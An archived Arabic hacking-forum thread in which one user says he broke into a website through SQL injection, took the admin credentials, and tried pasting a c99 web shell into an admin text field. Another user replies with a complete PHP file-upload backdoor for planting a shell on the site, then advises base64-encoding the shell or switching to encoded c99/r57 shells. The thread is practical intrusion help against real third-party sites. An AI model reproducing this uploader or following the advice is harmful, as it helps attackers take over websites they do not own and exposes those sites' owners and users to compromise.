:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   [حل مشكلة] دمج xss مع sql الرجاء الدخول مبتدا او محترف (http://www.vbspiders.com/vb/showthread.php?t=68122)

hisokaosomaki 08-20-2013 05:38 PM
دمج xss مع sql الرجاء الدخول مبتدا او محترف
 
السلام عليكم

البارح بينما كنت ابحث في المواقع المصابة بثغرات sql
وجدت احد المواقع المصابة وبعد سحب اليوزر والباس من قاعدة البيانات و الدخول بحساب الادمين
بحثت كالعادة عن مركز تحميل ملفات فلم اجد :sadwalk:
كل ما وجدته كان <textaera> اي ان قالب الصفحة موجود مع مكان لادخال نصوص
مفهوم ؟؟
المهم قلت اجرب كود جافا سكريبت و كانني ابحث عن ثغرة xss وضعت الكود فاشتغل
مفهوم ؟
المهم قلت لمادا لااضع الشل كاملا فهو في الاساس ليس الا اكواد php\
فتحت شل c99 بالمفكرة و عملت copy و لصقت كود الشل في مكان ادخال النصوص
ما رايكم هل اشتغل ؟


الاجابة هي نعم و لا
اشتغل و لكن في شكل ازرار مبعثرة و مخربطة في كافة ارجاء الصفحة
السوال هل يمكن استعمال هده الطريقة فعلا في حقن الشل و كيف ؟؟؟

MaFia 08-22-2013 12:47 PM
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف
 
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

كود:
<b>ApendiX</b>
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
    else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>
وبعدها ارفع شيلك منه

hisokaosomaki 08-22-2013 02:34 PM
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف
 
اقتباس:
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله
للاسف لم تشتغل ظهر هادا ا
ApendiX
echo '
'.php_uname().'
';
echo '';
echo '';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done The Work!!!

'; }
else { echo 'Upload Failed!

'; }
}
?>

MaFia 08-22-2013 11:43 PM
رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف
 
جرب تشفر الكود
base64

او شوف شل غير c99 او r57
يكون مشفر

وان شاء الله هيشتغل معاك


الساعة الآن 04:35 AM


[ vBspiders.Com Network ]